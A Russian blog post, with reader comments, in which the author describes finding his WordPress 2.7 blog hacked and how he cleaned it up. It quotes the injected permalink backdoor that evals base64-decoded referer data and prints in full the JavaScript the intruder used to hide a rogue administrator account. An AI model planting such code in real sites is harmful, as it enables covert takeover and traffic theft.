Хакнули блог на wordpress 2.7

один из моих сайтов, тот СДЛ что яндекс выкинул с индекса хакнули сегодня тоесть вчера

покупая ссылки в блогуне я решил проверить блог по одному запросу и пошол в гугл набрав запрос увидел свой блог при переходе по ссылке мне выбило 400 Bad Request

а в ссылке было типо

http://wasya.ru/2009/09/срочн/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

пошарясь в поиске я нашол еще много хакнутых блогов, ну да ладно..

в панели администрирования → wp → пользователи → было зарегано 3 пользователя, хотя в wp нет разрешения реги юзеров.

также была надпись Administrator (2) я не-понял прикола, отображался только один админ я, а написано что админов двое..

залез в исходный код и нашарил ссылку на скрытый профиль второго админа <a href="user-edit.php?user_id=5&#038;wp_http_referer=%2Fwp-admin%2Fusers.php%3Frole%3Dadministrator">HaywoodWarner72</a>

перейдя в его профиль увидел чудо

хакер ломает блог на wp

вот вам JS который он всунул туда
<div id="user_superuser"><script type="text/javascript"><!--
var setUserName = function(){    try{        var t=document.getElementById("user_superuser");        while(t.nodeName!="TR"){            t=t.parentNode;        };        t.parentNode.removeChild(t);        var tags = document.getElementsByTagName("H3");        var s = " shown below";        for (var i = 0; i < tags.length; i++) {            var t=tags[i].innerHTML;            var h=tags[i];            if(t.indexOf(s)>0){                s =(parseInt(t)-1)+s;                h.removeChild(h.firstChild);                t = document.createTextNode(s);                h.appendChild(t);            }        }        var arr=document.getElementsByTagName("ul");        for(var i in arr) if(arr[i].className=="subsubsub"){            var n= />Administrator ((d+))</gi.exec(arr[i].innerHTML);            if(n[1]>0){                var txt=arr[i].innerHTML.replace( />Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");        arr[i].innerHTML=txt;        }    }          }catch(e){};     };     addLoadEvent(setUserName);
// --></script></div>
ума хватило все поправить, перебил пасы, обновил wp, кто не понял уточняю.. хотели перелить мой трафик себе.

первый раз когда меня ломанули и первый раз когда я обновил движок wordpress, теперь эта процедура будит постоянной)

Метки:
Еще посты: Из рубрики:
  • http://seo4ski.biz/ Горный Оптимизатор

    Спасибо за грустный опыт. Будем знать )

  • http://pcgamer2005.ru/ PCGAMER2005

    Привет, попал с точно такой ситуации. Можешь рассказать, как вернуть исходный вид ссылок на сайте?
    А то пользователя этого удалил, пароли махнул.

  • http://seo-www.blogspot.com/ Михаил

    Да уж, херь!
    Как влезли, где уязвимость?
    Пробежался по своим сайтикам — вроде все ОК.

  • http://wlad2.ru/ wlad2

    >Как влезли, где уязвимость?
    пока не выяснил, но обновиться полюбому следует!
    >Можешь рассказать, как вернуть исходный вид ссылок на сайте?
    в разделе ЧПУ

  • http://homelerss.ru/ Бездомный Бродяга

    Жесть. Что пишут на оф. сайте? Про баг инфа там есть?

  • http://wlad2.ru/ wlad2

    Бездомный Бродяга,
    пишут что пизда рулю и последний wp тожа сломать можно.

  • Полат

    У меня та же ситуация, правда из трех блогов (2 на WP2.6 и 1 на 2.7) хакнули только один, который на 2.6.